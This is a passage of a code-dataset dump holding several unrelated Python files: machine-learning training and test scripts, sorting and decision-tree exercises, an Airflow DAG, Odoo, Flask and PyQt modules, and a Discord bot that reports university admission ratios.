world_size=world_size,\n rank=args.local_rank,\n )\n\n\n#常数\nno_optim = 0\ntrain_epoch_best_loss = 100.\n\nif os.path.exists('log/'):\n mylog = open('log/' + config.EXPNAME+'_' +str(args.local_rank) + '.log', 'a')\nelse:\n os.mkdir('log')\n mylog = open('log/' + config.EXPNAME + '_' +str(args.local_rank) +'.log', 'a')\n\n\nimagelist = os.listdir(ROOT+\"/src\")\ntrainlist = list(map(lambda x: x[:-4], imagelist)) #去后缀\n# print(trainlist)\n# 如果使用HRNet\nif config.MODEL.NAME =='seg_hrnet':\n print(\"preparing HRNet\")\n model = eval('models.'+config.MODEL.NAME +\n '.get_seg_model')(config)\nelif config.MODEL.NAME == 'ccnet':\n # if config.MODEL.PRETRAINED\n criterion = CriterionDSN() # CriterionCrossEntropy()\n model = eval('models.' + config.MODEL.NAME + '.Seg_Model')(\n num_classes=config.DATASET.NUM_CLASSES, criterion=criterion,\n pretrained_model=config.MODEL.PRETRAINED\n )\n\nelse:\n print('prepareing {}'.format(config.MODEL.NAME))\n model = eval(config.MODEL.NAME+'()')\n\n#eval('solver = MyFrame(model, '+'config.TRAIN.LOSS'+', lr)')\n# #配置framework,多分类的话改第二个参数,从loss_set中去选\nif config.MODEL.NAME == 'ccnet':\n solver = MyFrame(model, CriterionDSN, config, args, lr)\nelse:\n if config.TRAIN.LOSS == 'dice_bce_loss':\n solver = MyFrame(model,dice_bce_loss, config, args,lr)\n elif config.TRAIN.LOSS == 'CrossEntropy':\n solver = MyFrame(model, CrossEntropy, config, args, lr)\n elif config.TRAIN.LOSS == 'FocalLoss':\n solver = MyFrame(model, FocalLoss, config, args, lr)\n elif config.TRAIN.LOSS == 'Ohem':\n loss = OhemCrossEntropy(ignore_label=-1, thres=config.LOSS.OHEMTHRES)\n solver = MyFrame(model, loss, config, args, lr)\n else:\n raise RuntimeError\n\nif config.TRAIN.RESUME is True:\n print('resume from {}'.format(config.TRAIN.RESUME_START))\n print('resume from {}'.format(config.TRAIN.RESUME_START), file=mylog)\n solver.load(config.MODEL.PRETRAINED)\n\ndataset = ImageFolder(trainlist, ROOT, trainclass=config.TRAIN.TRAINCLASS)#如果train class设置为-1,则代表多分类\n\n# solver = MyFrame(xxx, CrossEntropy, lr) 多分类\nif config.USESYNCBN is True:\n print('syncBN dataloader')\n batchsize = BATCHSIZE_PER_CARD #计算batch大小\n # syncBN分布式\n sampler = torch.utils.data.distributed.DistributedSampler(\n dataset,\n num_replicas=world_size,\n rank=args.local_rank\n )\n data_loader = torch.utils.data.DataLoader(\n dataset,\n # shuffle=config.TRAIN.SHUFFLE,\n batch_size=batchsize,\n num_workers=config.TRAIN.NUM_WORKERS,\n pin_memory=False,\n sampler=sampler,\n drop_last=True)\nelse:\n a = time()\n batchsize = CARD_NUM * BATCHSIZE_PER_CARD\n data_loader = torch.utils.data.DataLoader(\n dataset,\n shuffle=True,\n batch_size=batchsize,\n num_workers=config.TRAIN.NUM_WORKERS,\n drop_last=True,\n pin_memory = True) # 加了这个测试一下会不会变快\n print(\"dataloadertime\", time() - a)\n\n\n\n\ntic = time()\n\nwriter = SummaryWriter('runs/'+ config.EXPNAME)\n\n#TODO 只存储rank0的模型和输出即可\n\n\nfor epoch in range(1, total_epoch + 1):\n print('---epoch start-----')\n #data_loader_iter = iter(data_loader)\n train_epoch_loss = 0\n for img, mask in data_loader:\n\n solver.set_input(img, mask)\n train_loss = solver.optimize(config)\n train_epoch_loss += train_loss\n train_epoch_loss /= len(data_loader)\n if args.local_rank == 0:\n print('********',file=mylog)\n print('epoch:'+ str(epoch+config.TRAIN.RESUME_START) + ' time:'+ str(time()-tic), file=mylog)\n print('train_loss: {}'.format(train_epoch_loss), file=mylog)\n writer.add_scalar('scalar/train',train_epoch_loss,epoch+config.TRAIN.RESUME_START)\n print('********')\n print('epoch:'+str(epoch+config.TRAIN.RESUME_START)+' time:'+ str(time()-tic))\n print('train_loss: {}'.format(train_epoch_loss))\n split = False\n if epoch%10 == 0:\n\n BATCHSIZE_PER_CARD = config.TEST.BATCH_SIZE_PER_GPU\n label_list = config.TEST.LABEL_LIST\n source = config.TEST.ROOT\n if config.MODEL.NAME == 'seg_hrnet':\n test = TTAFrame(HighResolutionNet, 'HRNet', label_list, config=config)\n else:\n test = TTAFrame(ResNet, 'ccnet', label_list, config=config)\n test.load(config.TEST.WEIGTH)\n kappa, oa = test.test(source=source, label_list=label_list, split = split)\n split = True\n # print(text)\n print(\"kappa: \" + str(kappa) + '\\r\\n')\n print(\"oa: \" + str(oa) + '\\r\\n')\n\n # print(text, file=mylog)\n print(\"kappa: \" + str(kappa) + '\\r\\n', file=mylog)\n print(\"oa: \" + str(oa) + '\\r\\n', file=mylog)\n writer.add_scalar(\"Test/Accu(oa)\", oa, epoch)\n writer.add_scalar(\"Test/Accu(kappa)\", kappa, epoch)\n # print('SHAPE: {}'.format(SHAPE))\n\n #模型保存策略,停止条件和,调整lr_rate的时间\n if train_epoch_loss >= train_epoch_best_loss:\n no_optim += 1\n else:\n no_optim = 0\n train_epoch_best_loss = train_epoch_loss\n solver.save('weights/'+config.EXPNAME+'.th')#+'__'+str(args.local_rank)\n if no_optim > 10:\n print('early stop at %d epoch' % (epoch+config.TRAIN.RESUME_START), file=mylog)\n print('early stop at %d epoch' % (epoch+config.TRAIN.RESUME_START))\n break\n if no_optim > 4:\n if solver.old_lr < 5e-7:\n break\n #solver.load('weights/'+config.EXPNAME+'.th')\n solver.update_lr(5.0, factor=True, mylog=mylog)\n mylog.flush()\n\nwriter.close()\nprint ('Finish!',file=mylog)\nprint('Finish!')\nmylog.close()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301116676","text":"class adsort:\n def partition(arr,low,high): \n i = ( low-1 ) # 最小元素索引\n pivot = arr[high] \n for j in range(low , high): \n # 当前元素小于或等于 pivot \n if arr[j] <= pivot: \n i = i+1 \n arr[i],arr[j] = arr[j],arr[i] \n arr[i+1],arr[high] = arr[high],arr[i+1] \n return ( i+1 ) \n # arr[] --> 排序数组\n # low --> 起始索引\n # high --> 结束索引 \n # 快速排序函数\n def quickSort(arr,low,high): \n if low < high: \n pi = adsort.partition(arr,low,high) \n adsort.quickSort(arr, low, pi-1) \n adsort.quickSort(arr, pi+1, high)\n\n \n \n #归并排序\n def mergeSort(arr,left,right):\n if left>=right:\n return arr\n mid=(left+right)>>1\n adsort.mergeSort(arr,left,mid)\n adsort.mergeSort(arr,mid+1,right)\n adsort.merge(arr,left,mid,right)\n \n #归并排序之合并\n def merge(arr,left,mid,right):\n result=[]\n i,j=left,mid+1\n while i<=mid and j<=right:\n if arr[i]<=arr[j]:\n result.append(arr[i])\n i+=1\n else:\n result.append(arr[j])\n j+=1\n while i<=mid:\n result.append(arr[i])\n i+=1\n while j<=right:\n result.append(arr[j])\n j+=1\n arr[left:right+1]=result\n \n\n\n\n\n\narr1 = [9,7,6,3,1,8,6,4,2]\narr2 = [8,6,4,2,9,7,3,1]\nn1 = len(arr1)\nn2 = len(arr2)\nadsort.quickSort(arr1,0,n1-1)\nadsort.mergeSort(arr2,0,n2-1)\nprint (\"快速排序后的数组:\",arr1)\nprint (\"归并排序后的数组:\",arr2)\n\n","sub_path":"Week_08/advancedsort.py","file_name":"advancedsort.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"108429368","text":"from odoo import models, fields, api\n\n\nclass MailComposer(models.TransientModel):\n _inherit = 'mail.compose.message'\n\n extra_attachment_ids = fields.Many2many(\n 'ir.attachment', 'mail_compose_message_ir_extra_attachments_rel',\n 'wizard_id', 'attachment_id', 'Attachments')\n\n def onchange_template_id(self, template_id, composition_mode, model, res_id):\n result = super(MailComposer, self).onchange_template_id(template_id, composition_mode, model, res_id)\n if result.get('value') and result.get('value').get('attachment_ids'):\n attachment_list = result.get('value').get('attachment_ids')[0][2]\n if self.extra_attachment_ids:\n attachment_list += self.extra_attachment_ids.ids\n return result\n\n","sub_path":"odx_sale_purchase_customization/wizard/mail_compose_message.py","file_name":"mail_compose_message.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"127714847","text":"################################################################################\n## 3D Plot widget\n# Author: Maleakhi, Alex, Faidon, Jamie, Olle, Harry\n################################################################################\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets\nfrom matplotlib.backends.backend_qt5agg import (\n FigureCanvas, NavigationToolbar2QT as NavigationToolbar)\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n###############################################################################\n## 3D Trajectories Plot\n# Display agent's trajectories\n\nclass Plot3D(QWidget):\n \"\"\"\n Class to plot agent's trajectories.\n \"\"\"\n\n def __init__(self):\n \n super().__init__()\n\n # 3D Plot settings\n self.window = None\n self.fig = plt.figure(figsize=(3, 6))\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.canvas = FigureCanvas(self.fig)\n\n # Agent trajactories storage\n self.x_traj = []\n self.y_traj = []\n self.z_traj = []\n\n # Target storage\n self.tgt_x = []\n self.tgt_y = []\n self.tgt_z = []\n\n # Manage layout\n vbox = QVBoxLayout()\n vbox.addWidget(self.canvas)\n\n self.setLayout(vbox)\n \n def add_trajectories(self, x, y, z):\n \"\"\"\n Add trajectories\n\n :param x: x value to be added\n :param y: y value to be added\n :param z: z value to be added\n \"\"\"\n\n self.x_traj.append(x)\n self.y_traj.append(y)\n self.z_traj.append(z)\n \n def add_target(self, target):\n \"\"\"\n Add target coordinates.\n\n :param target: array of targets\n \"\"\"\n\n if target is not None:\n self.tgt_x.append(target[0])\n self.tgt_y.append(target[1])\n self.tgt_z.append(target[2])\n \n def clear_3d(self):\n \"\"\"\n Used to clear 3d trajectories\n \"\"\"\n \n self.x_traj = []\n self.y_traj = []\n self.z_traj = []\n\n self.tgt_x = []\n self.tgt_y = []\n self.tgt_z = []\n\n width = self.window.widget.width\n height = self.window.widget.height\n height_x = self.window.widget.height_x\n\n self.ax.clear()\n self.set_3d_axes(self.ax, width, height, height_x)\n self.canvas.draw()\n \n def set_3d_axes(self, ax, x_lim, y_lim, z_lim):\n \"\"\"\n Sets the axis labels and limits.\n \"\"\"\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n \n ax.set_xlim(0, x_lim)\n ax.set_ylim(0, y_lim)\n ax.set_zlim(0, z_lim)\n \n def draw(self):\n \"\"\"\n Draw plots\n \"\"\"\n\n width = self.window.widget.width\n height = self.window.widget.height\n height_x = self.window.widget.height_x\n\n self.ax.plot(self.x_traj,self.y_traj,self.z_traj, c=\"#0091D4\", linewidth=1.5)\n self.ax.plot(self.tgt_x,self.tgt_y,self.tgt_z, marker='x', c='green', linewidth=1.5)\n self.set_3d_axes(self.ax, width, height, height_x)\n self.canvas.draw()","sub_path":"examples/LandmarkDetection/DQN/GUI/plot_3d.py","file_name":"plot_3d.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"426714067","text":"import airflow\nfrom airflow import DAG\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow import models\nfrom ncaa_dependencies.table_schemas import *\nfrom airflow.contrib.operators.bigquery_operator import BigQueryOperator\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n #'start_date': airflow.utils.dates.days_ago(2),\n 'start_date': datetime(2019, 6, 11, 14, 30),\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\n\ndag = DAG('NCAA_View_to_Table',\n default_args=default_args,\n schedule_interval=timedelta(days=1),\n catchup=False\n )\n\nstart = BashOperator(task_id='start_message',\n bash_command='echo \"started\"',\n dag=dag)\n\n\nend = BashOperator(task_id='end_message',\n bash_command='echo \"Finished\"',\n dag=dag)\n\n\n\n\n\nfor table in TABLES:\n\n\n query = BigQueryOperator(\n sql=f'SELECT * FROM {table}',\n task_id=f'append_{table}_to_table',\n destination_dataset_table=f'{APPEND[table]}',\n allow_large_results=True,\n bigquery_conn_id='bigquery_default',\n create_disposition='CREATE_IF_NEEDED',\n write_disposition='WRITE_APPEND',\n use_legacy_sql=False,\n dag=dag\n )\n start >> query >> end\n","sub_path":"BQ-append-DAG/ncaa_bq_DAG.py","file_name":"ncaa_bq_DAG.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"373720193","text":"from traffgroup.core.X.xflask import Controller, Route\nfrom traffgroup.core.X.mako import render_template\nfrom flask import g, request, redirect\nfrom traffgroup.x.security import CProtect\nfrom traffgroup.core.model.partners import TicketMessage, Ticket\nfrom traffgroup.core.model.meta import Session\nfrom sqlalchemy.sql.expression import desc\nfrom traffgroup.x.util.func import try_int\nfrom traffgroup.core.model.security.account import Account\nfrom webhelpers.paginate import Page, PageURL\n\nfrom traffgroup.admin.lib.predicate import IsAdmin\n\n\nPER_PAGE = 25\n\n\n@CProtect(IsAdmin())\n@Controller(\"/tickets\")\nclass TicketsController(object):\n @Route('/')\n def list(self): #@ReservedAssignment\n g.partner = try_int(request.values.get('partner', -1))\n g.type = try_int(request.values.get('type', -1))\n g.status = try_int(request.values.get('status', -1))\n g.importance = try_int(request.values.get('importance', -1))\n g.page = (abs(try_int(request.values.get('page'))) or 1) - 1\n\n q_account = Session.query(Account)\n\n g.partners = q_account.all()\n\n q = Session.query(Ticket, Account).filter(\n Ticket.partner_id == Account.id)\n\n if g.type != -1: q = q.filter(Ticket.type == g.type)\n\n if g.partner != -1: q = q.filter(Ticket.partner_id == g.partner)\n\n if g.status != -1: q = q.filter(Ticket.state == g.status)\n\n if g.importance != -1: q = q.filter(Ticket.importance == g.importance)\n\n #q = q.order_by(asc(Ticket.state),desc(Ticket.ts_last), desc(Ticket.importance))\n q = q.order_by(desc(Ticket.ts_spawn))\n\n g.tickets = q.limit(PER_PAGE).offset(g.page * PER_PAGE).all()\n tickets_ids = [ticket.id for ticket, account in g.tickets]\n g.messages_dict = {}\n for message in TicketMessage.Filter(TicketMessage.ticket_id.in_(tickets_ids)):\n if message.ticket_id not in g.messages_dict:\n g.messages_dict[message.ticket_id] = []\n g.messages_dict[message.ticket_id].append(message)\n\n xargs = {\"partner\": g.partner,\n \"type\": g.type,\n \"status\": g.status,\n \"importance\": g.importance}\n\n g.paginator = Page(range(q.count()),\n items_per_page=PER_PAGE,\n page=g.page + 1,\n url=PageURL('/tickets', xargs))\n\n return render_template(\"tickets/index.mako\")\n\n\n @Route('/messages/')\n def messages(self, ticket_id=None):\n\n if ticket_id == None:\n return render_template(\"tickets/thread.mako\")\n\n g.ticket = Ticket.Get(ticket_id)\n\n g.messages = TicketMessage.Filter(ticket_id=ticket_id).all()\n\n return render_template(\"tickets/thread.mako\")\n\n\n @Route('/reply/', methods=['GET', 'POST'])\n def reply(self, ticket_id=None):\n if not ticket_id:\n redirect('tickets')\n\n txt = request.form.get('reply')\n isclose = request.form.get('close-thread', 0)\n\n g.ticket = Ticket.Get(ticket_id)\n g.messages = TicketMessage.Filter(ticket_id=ticket_id).all()\n g.ticket.reply(TicketMessage(message=txt, flags=TicketMessage.Flag.SYSTEM))\n\n if isclose:\n g.ticket.state = Ticket.State.CLOSED\n g.ticket.save()\n\n g.state = g.ticket.state\n\n return redirect('tickets/messages/%d' % ticket_id)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"traffgroup/admin/controllers/ticket.py","file_name":"ticket.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"538765034","text":"# def divisible_by_five(n):\n# if(n % 5 == 0):\n# \t return True\n# else:\n# return False\n\n# print(divisible_by_five(21))\n\n\n# #less than 100\n# def less_than_100(a, b):\n# if(a + b < 100):\n# return True\n# else:\n# return False\n\n\n# print(less_than_100(90, 9)\n\n# def frames(minutes, fps):\n# \treturn (minutes * 60) * (fps)\n# #return results\n \n# print(frames(60,1))\n\n# def divisible(num):\n# if(num % 100 ==0):\n# return True\n# else:\n# return False\n# print(divisible(100))\n\nsmallest = None\nprint(\"Before:\", smallest)\nfor itervar in [3, 41, 12, 9, 74, 15]:\n if smallest is None or itervar < smallest:\n smallest = itervar\n break\n print(\"Loop:\", itervar, smallest)\nprint(\"Smallest:\", smallest)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"588872462","text":"#from models.producto import Producto\nfrom controllers.login import logged\nfrom models.usuario_de_internet import Usuario_de_internet\n#from models.orden import Orden\nimport web\n\nrender = web.template.render('templates/', base=\"base\")\nclass VerOrdenesPrevias():\n def GET(self):\n #import ipdb; ipdb.set_trace() \n ordenes=Orden.getPrevias(web.ctx.session.privilege)\n return render.ver_ordenes_previas(ordenes)\n\nclass VerCarrito:\n def GET(self):\n order = Orden.getCarrito(web.ctx.session.privilege)\n user = Usuario_de_internet.getById(web.ctx.session.privilege)\n order_lines = order.getLineas(user.dr_ciudad_id)\n total = 0\n for ol in order_lines:\n total += ol['cantidad'] + ol['precio']\n return render.carrito(order_lines, total=total, user=user)\n\n\nclass AnadirProducto:\n def POST(self):\n #import ipdb; ipdb.set_trace()\n mensaje = \"Producto agregado!\"\n user = Usuario_de_internet.getById(web.ctx.session.privilege)\n datos = web.input()\n producto_id = int(datos['producto_id'])\n cantidad = int(datos['cantidad'])\n order = Orden.getCarrito(web.ctx.session.privilege)\n order.anadirProducto(producto_id, cantidad)\n web.seeother(\"/carrito/\")\n\n\nclass CheckOutCarrito:\n def POST(self):\n #import ipdb; ipdb.set_trace()\n from models.producto import Producto\n datos = web.input()\n medio_de_pago = datos['medio_de_pago']\n user = Usuario_de_internet.getById(web.ctx.session.privilege)\n dr_ciudad_id = user.dr_ciudad_id\n order = Orden.getCarrito(user.id)\n order.medio_de_pago = medio_de_pago\n order_lines = order.getLineas(user.dr_ciudad_id)\n total = 0\n for ol in order_lines:\n Producto.getById(ol['product_id']).reducirEnCiudad(dr_ciudad_id, ol['cantidad'])\n total += ol['cantidad'] + ol['precio']\n order.total= total\n order.save()\n Orden.create(web.ctx.session.privilege)\n web.seeother(\"/carrito/\")","sub_path":"controllers/order_controller.py","file_name":"order_controller.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118403561","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 19 02:32:19 2018\n\n@author: vedanta\n\"\"\"\n\nimport numpy as np\nfrom datetime import datetime\nfrom util import get_data,get_xor\n\ndef entropy(Y):\n N = len(Y)\n s1= (y==1).sum()\n if s1==0 or s1==N:\n return 0\n p1 = s1/N\n p0 = 1-p1\n return -p0*np.log2(p0) - p1*np.log2(p1)\n\ndef Information_Gain(self,x,y,best_split):\n N = len(y)\n y0 = y[x=best_split]\n y0_prob = len(y0)/N\n y1_prob = 1 - y0\n return entropy(y) - y0_prob*entropy(y0) - y1_prob*entropy(y1)\n\ndef find_split(self,X,Y,col):\n sorted_indices = np.argsort(X[:,col])\n x_sort = X[sorted_indices]\n y_sort = Y[sorted_indices]\n boundaries = np.nonzero(y_sort[:-1]!=y_sort[1:])[0]\n max_IG = 0\n best_split = None\n \n for i in boundaries:\n x_split = (x_sort[i] + x_sort[i+1])/2\n IG = Information_Gain(x_sort,y_sort,x_split)\n if IG>max_IG:\n max_IG = IG\n best_split = x_split\n return IG,best_split\n \nclass TreeNode:\n def __init__(self,depth=0,max_depth=None):\n self.depth = depth\n self.max_depth = max_depth\n \n def fit(self,X,Y):\n if(len(Y)==1 or len(set(Y))==1):\n self.col = None\n self.split = None\n self.right = None\n self.left = None\n self.prediction = Y[0]\n else:\n D = X.shape[1]\n cols = range(D)\n max_IG = 0\n best_col= None\n best_split = None\n for col in cols:\n IG,split = find_split(X,Y,col)\n if IG>max_IG:\n max_IG = IG\n best_split = split\n best_col = col\n if max_IG == 0: \n \"\"\"Leaf Node\"\"\"\n self.col = None\n self.split = None\n self.left = None\n self.right = None\n self.prediction = np.round(Y.mean())\n else :\n self.col = best_col\n self.split = best_split\n if self.depth == self.max_depth:\n \"\"\"If we do not set a max_depth, it would lead to overfitting\"\"\"\n self.left = None\n self.right = None\n self.prediction = [\n np.round(Y[X[:,best_col]=best_split].mean())\n ]\n else:\n left_indices = X[:,best_col]=best_split\n \n x_left = X[left_indices]\n y_left = Y[left_indices]\n x_right = X[right_indices]\n y_right = Y[right_indices]\n self.left = TreeNode(self.depth+1,self.max_depth)\n self.right = TreeNode(self.depth+1,self.max_depth)\n self.left.fit(x_left,y_left)\n self.right.fit(x_right,y_right)\n \n \n \n def predict_one(self,x):\n \"\"\"Predict for only one case\"\"\"\n if self.col is not None and self.split is not None:\n feature = x[self.col]\n \n if feature < self.best_split:\n if self.left:\n return self.left.predict_one(x)\n else:\n return self.prediction[0]\n \n else:\n if self.right:\n return self.right.predict_one(x)\n else:\n return self.prediction[1]\n \n else:\n return self.prediction\n \n def predict(self,X):\n N,D = X.shape()\n p = np.zeros(N)\n for i in xrange(N):\n p[i] = self.predict_one(X[i])\n return p\n \nclass DecisionTree:\n def __init__(self,max_depth=0):\n self.max_depth = max_depth\n \n def fit(self,X,Y):\n self.root = TreeNode(0,self.max_depth)\n self.root.fit(X,Y)\n \n def predict(self,X):\n return self.root.predict(X)\n \n def score(self,X,Y):\n p = self.predict(X)\n return np.mean(Y==p)\n \n \n \n \n \n \n","sub_path":"Supervised Learning/DecisionTrees.py","file_name":"DecisionTrees.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"558242342","text":"import datetime\n\nimport aiohttp\nimport pyppeteer\nfrom discord import Embed, Webhook, AsyncWebhookAdapter\nfrom discord.ext import commands, tasks\n\nfrom univ_ratio.dtutils import get_discord_timestamp\nfrom univ_ratio.get_univ_ratio import UnivObject, UnivConfig\n\n\nclass UnivBot(commands.Bot):\n def __init__(self):\n super(UnivBot, self).__init__(command_prefix=['대학경쟁률 '], help_command=None)\n self.config: UnivConfig = UnivConfig.load()\n self.session = aiohttp.ClientSession()\n self.webhook = Webhook.from_url('YOUR_WEBHOOK_URL', adapter=AsyncWebhookAdapter(session=self.session))\n\n self.add_command(self.univ_ratio_cmd)\n self.add_command(self.ur_view_cmd)\n self.add_command(self.ur_update_cmd)\n\n async def on_ready(self):\n self.update_and_notify.start()\n\n async def close(self):\n self.config.save()\n self.update_and_notify.cancel()\n await self.session.close()\n await super(UnivBot, self).close()\n\n @tasks.loop(hours=1)\n async def update_and_notify(self):\n browser = await pyppeteer.launch(headless=True, args=[\n '--no-sandbox',\n '--disable-setuid-sandbox'\n ])\n self.config.updated = datetime.datetime.utcnow().astimezone(tz=datetime.timezone.utc)\n for univ in self.config.univ_data.values():\n data = await univ.update(browser)\n if not univ.final:\n await self.webhook.send(\n username=univ.name,\n content=f'경쟁률이 갱신되었습니다!',\n embed=Embed(\n title=f'{univ.name} {data.name}',\n description=f'갱신일자 : {get_discord_timestamp(self.config.updated)}'\n ).add_field(\n name='모집인원',\n value=f'{data.recruit} 명',\n inline=True\n ).add_field(\n name='지원자',\n value=f'{data.apply} 명',\n inline=True\n ).add_field(\n name='경쟁률',\n value=f'{data.ratio} : 1',\n inline=True\n )\n )\n await browser.close()\n\n @commands.group(\n name='univ-ratio',\n aliases=['ur', '대학경쟁률', 'ㄷㄱ']\n )\n async def univ_ratio_cmd(self, ctx: commands.Context):\n if not ctx.invoked_subcommand:\n await ctx.send(embed=Embed(\n title='별무리 - 대학경쟁률',\n description='대학 관련 기능입니다.'\n ).add_field(\n name='보기',\n value='대학경쟁률을 확인합니다.\\n'\n '`ㅂㅁㄹ 대학경쟁률 보기` 로 사용할 수 있습니다.',\n inline=False\n ).add_field(\n name='갱신',\n value='대학경쟁률을 수동으로 갱신합니다.\\n'\n '`ㅂㅁㄹ 대학경쟁률 갱신` 으로 사용할 수 있습니다.',\n inline=False\n ))\n\n @univ_ratio_cmd.command(\n name='view',\n aliases=['보기']\n )\n async def ur_view_cmd(self, ctx: commands.Context):\n embed = Embed(\n title='대학 경쟁률 정보',\n description='등록된 대학-전형의 경쟁률을 표시합니다.'\n )\n for univ in self.config.univ_data.values():\n embed.add_field(\n name=f'{univ.name} {univ.ratio_data.name} ' if univ.ratio_data is not None else f'{univ.name} UNKNOWN ' + '(최종)' if univ.final else '(갱신중)',\n value=f'{univ.ratio_data.ratio} : 1' if univ.ratio_data is not None else 'NOT PARSED',\n inline=False\n )\n await ctx.send(embed=embed)\n\n @univ_ratio_cmd.command(\n name='manual-update',\n aliases=['mu', '수동갱신', '갱신']\n )\n async def ur_update_cmd(self, ctx: commands.Context):\n await self.update_and_notify()\n await ctx.send('> 갱신했습니다.')\n\n\nbot = UnivBot()\nbot.run('YOUR_TOKEN')\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"187318812","text":"import importlib\nimport os\n\nimport mod1\n\n\ndef main():\n print(os.getcwd())\n mod_name = os.getcwd().replace('/', '.') + '.function'\n print(mod_name)\n # module = importlib.import_module(mod_name)\n # module.sayhello()\n\n mod1.funA()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/importlib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"266703313","text":"import gym\nimport numpy as np\nimport tensorflow as tf\nfrom q_net import q_net\nimport matplotlib.pyplot as plt\n\nnum_episodes = int(1e3)\n\nenv = gym.make('Breakout-v0')\nenv.seed(0)\n\nlearning_network = q_net('learning')\ntarget_network = q_net('target')\nsaver = tf.train.Saver()\n\ndef preprocess(image):\n \"\"\" prepro 210x160x3 uint8 frame into 6400 (80x80) 2D int array \"\"\"\n image = image[35:195] # crop\n image = image[::2,::2,0] # downsample by factor of 2\n image[image == 144] = 0 # erase background (background type 1)\n image[image == 109] = 0 # erase background (background type 2)\n image[image != 0] = 1 # everything else just set to 1\n return np.reshape(image.astype(np.uint8).ravel(), [80,80])\n\ndef create_new_state(obs):\n new_state = np.stack([obs, obs, obs, obs], axis=2)\n return new_state\n\ndef roll_state(state, obs):\n new_state = np.roll(state, 1, axis=2)\n new_state[:, :, 0] = obs\n return new_state\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver.restore(sess, 'partially_trained_model/model.ckpt')\n\n obs = env.reset()\n obs = preprocess(obs)\n state = create_new_state(obs)\n\n rewards_tracker = []\n\n for iteration in range(num_episodes):\n rewards = []\n\n while True:\n state_input = np.stack([state]).astype(dtype=np.float32) # prepare to feed placeholder learning_network.obs\n Q = learning_network.get_Q(obs=state_input)\n act = np.argmax(Q)\n\n next_obs, reward, done, _ = env.step(act)\n\n rewards.append(reward)\n\n if done:\n obs = env.reset()\n obs = preprocess(obs)\n state = create_new_state(obs)\n\n break\n else:\n next_obs = preprocess(next_obs)\n new_state = roll_state(state, next_obs)\n state = new_state\n\n rewards_tracker.append(sum(rewards))\n smoothed_rewards_tracker = [np.mean(rewards_tracker[max(0, i - 10):i + 1]) for i in range(len(rewards_tracker))]\n\n plt.figure(figsize=(8, 6))\n plt.plot(rewards_tracker, 'b.', label='total reward')\n plt.plot(smoothed_rewards_tracker, 'r', label='smoothed')\n plt.xlabel('episode number', fontsize=20)\n plt.legend(loc='upper right', prop={'size': 20})\n plt.savefig('test_rewards.png')\n plt.close()\n\n print(iteration, sum(rewards))\n","sub_path":"breakout-v0/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"514469632","text":"# Create a circle around the nucleus and walk through all the rays coming from the center, looking for the cell wall\r\n# Xu_Yang 2020.8.11\r\n\r\nimport math_test\r\nimport cv2 as cv\r\nfrom math_test import *\r\nfrom pylab import *\r\nfrom pixelbetweenpoints import pixel_between_two_points\r\ndef step4(cell_id):\r\n\r\n display = cv.imread(\"bin\\\\temp.bmp\")\r\n\r\n\r\n img = cv.imread(\"bin\\\\temp_1.bmp\")\r\n img_result = img.copy()\r\n # img=cv.cvtColor(img,cv.COLOR_BGR2BGRA)\r\n\r\n\r\n # -----preprocess-----\r\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n # cv.imshow(\"gray\", gray)\r\n\r\n gauss = cv.GaussianBlur(gray, (5, 5), 5)\r\n\r\n img_shape = gauss.shape\r\n\r\n # read from local\r\n f = open(\"bin\\\\dict.txt\", 'r')\r\n dict_ = eval(f.read())\r\n f.close()\r\n #print(\"read from local : \", dict_)\r\n # distance from single point to center\r\n distance_from_single_point_to_center_list = []\r\n\r\n for m in range(cell_id, cell_id+1): # 对某些点进行测试# 28上一次测试的\r\n # \r\n\r\n x_sample = dict_[m][0]\r\n 